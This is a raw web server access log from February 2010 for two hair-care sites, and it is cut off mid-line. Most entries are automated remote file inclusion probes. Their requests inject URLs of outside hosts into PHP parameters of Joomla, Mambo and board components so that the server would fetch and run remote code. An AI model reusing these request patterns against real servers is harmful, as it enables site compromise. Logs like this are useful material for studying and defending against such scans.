81.174.65.27 - - [23/Feb/2010:10:42:25 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:10:43:01 -0800] "GET /download.php?board_skin_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:10:43:01 -0800] "GET /logs/access_100111.log%20%20//download.php?board_skin_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:10:43:06 -0800] "GET /logs/access_100125.log%20%20//download.php?board_skin_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:10:43:11 -0800] "GET /logs//download.php?board_skin_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:10:43:28 -0800] "GET /logs/access_100125.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:10:43:29 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:10:43:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:10:46:32 -0800] "GET /logs/access_091123.log//Neos_Chronos/header.php?base_folder=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:10:52:22 -0800] "GET /logs/access_091123.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:10:52:22 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.214.191.210 - - [23/Feb/2010:10:53:35 -0800] "GET /freehairsecretsphp/index.php+++++++++++++++++++++++++Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29 HTTP/1.0" 404 - "http://growlonghairfast.com/freehairsecretsphp/index.php+++++++++++++++++++++++++Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29" "Mozilla/0.6 Beta (Windows)" "growlonghairfast.com"
64.214.191.210 - - [23/Feb/2010:10:53:36 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/0.6 Beta (Windows)" "growlonghairfast.com"
98.129.77.98 - - [23/Feb/2010:10:55:00 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
98.129.77.98 - - [23/Feb/2010:10:55:00 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
98.129.77.98 - - [23/Feb/2010:10:55:04 -0800] "GET /logs/access_091123.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:11:00:20 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
81.174.65.27 - - [23/Feb/2010:11:00:20 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
81.174.65.27 - - [23/Feb/2010:11:01:49 -0800] "GET /logs/access_100125.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
81.174.65.27 - - [23/Feb/2010:11:01:49 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
98.129.77.98 - - [23/Feb/2010:11:02:28 -0800] "GET /logs/access_100125.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
98.129.77.98 - - [23/Feb/2010:11:02:28 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
98.129.77.98 - - [23/Feb/2010:11:02:43 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
98.129.77.98 - - [23/Feb/2010:11:02:43 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:04:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:04:19 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:04:19 -0800] "GET /delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:06:03 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:06:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:06:03 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:06:41 -0800] "GET /delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:11:06:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:11:06:42 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:11:08:52 -0800] "GET /logs/access_100111.log%20%20//delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:22:21 -0800] "GET /logs//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:11:22:21 -0800] "GET /errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:11:22:21 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [23/Feb/2010:11:22:59 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [23/Feb/2010:11:22:59 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [23/Feb/2010:11:23:00 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:11:24:49 -0800] "GET /errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:11:24:49 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:11:24:49 -0800] "GET /logs//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [23/Feb/2010:11:25:52 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:11:41:25 -0800] "GET /logs//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:11:41:25 -0800] "GET /errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:11:41:25 -0800] "GET /logs/access_100104.log%20%20//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:11:52:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:11:52:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:11:52:23 -0800] "GET /logs/access_091214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.12 - - [23/Feb/2010:11:53:44 -0800] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:11:56:13 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:11:56:13 -0800] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.225.42.178 - - [23/Feb/2010:11:56:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:22 -0800] "GET /send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:22 -0800] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:22 -0800] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:22 -0800] "GET /logs/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:22 -0800] "GET /logs/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:22 -0800] "GET /send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.153 - - [23/Feb/2010:11:58:42 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [23/Feb/2010:11:58:42 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [23/Feb/2010:11:58:42 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [23/Feb/2010:11:58:49 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://61.250.91.115/zboard/data/bbs_kor/1191893467/mboh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [23/Feb/2010:11:58:49 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://61.250.91.115/zboard/data/bbs_kor/1191893467/mboh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.153 - - [23/Feb/2010:11:58:50 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://61.250.91.115/zboard/data/bbs_kor/1191893467/mboh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:11:58:52 -0800] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:52 -0800] "GET /send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:52 -0800] "GET /logs/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:52 -0800] "GET /logs/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:52 -0800] "GET /send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:11:58:53 -0800] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.1.7 - - [23/Feb/2010:12:05:29 -0800] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
67.195.112.187 - - [23/Feb/2010:12:08:25 -0800] "GET /?N=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.115.227 - - [23/Feb/2010:12:26:58 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
58.150.99.144 - - [23/Feb/2010:12:27:10 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:27:10 -0800] "GET /logs//main.php?sayfa=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:27:11 -0800] "GET /main.php?sayfa=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:29:39 -0800] "GET /logs//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:29:39 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:29:39 -0800] "GET /errors.php?error=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:30:00 -0800] "GET /logs/access.log///administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:30:00 -0800] "GET /logs///administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:30:00 -0800] "GET //administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:12:30:59 -0800] "GET /logs/mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:12:30:59 -0800] "GET /logs/access.log%20%20/mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:12:30:59 -0800] "GET /mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:31:15 -0800] "GET /logs///index.php?option=com_sef&mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:31:15 -0800] "GET /logs/access.log///index.php?option=com_sef&mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:31:16 -0800] "GET //index.php?option=com_sef&mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:32:34 -0800] "GET /logs///administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:32:35 -0800] "GET //administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [23/Feb/2010:12:32:35 -0800] "GET /logs/access.log///administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/img/255/auth1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.93.134.178 - - [23/Feb/2010:12:37:39 -0800] "GET /logs/access_100118.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:12:37:46 -0800] "GET /logs/access_100118.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:12:38:16 -0800] "GET /logs/access_100118.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.93.134.178 - - [23/Feb/2010:12:38:50 -0800] "GET /logs/access_100118.log%20%20/send_reminders.php?includedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.171.180.4 - - [23/Feb/2010:12:45:20 -0800] "GET /logs/errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.freehairsecrets.com"
88.171.180.4 - - [23/Feb/2010:12:45:20 -0800] "GET /errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.freehairsecrets.com"
88.171.180.4 - - [23/Feb/2010:12:55:04 -0800] "GET /errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.freehairsecrets.com"
88.171.180.4 - - [23/Feb/2010:12:55:04 -0800] "GET /logs/errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:56:12 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:56:12 -0800] "GET /logs/access.log%20%20//?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:12:56:12 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.115.6.16 - - [23/Feb/2010:12:57:51 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
67.195.112.187 - - [23/Feb/2010:13:04:38 -0800] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
87.110.84.159 - - [23/Feb/2010:13:07:39 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "growlonghairfast.com"
87.110.84.159 - - [23/Feb/2010:13:07:39 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "growlonghairfast.com"
87.106.183.19 - - [23/Feb/2010:13:09:31 -0800] "GET /mambo/administrator/components/admin.remository.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.19 - - [23/Feb/2010:13:09:31 -0800] "GET /logs/access_091123.log//mambo/administrator/components/admin.remository.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.19 - - [23/Feb/2010:13:09:31 -0800] "GET /logs//mambo/administrator/components/admin.remository.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghair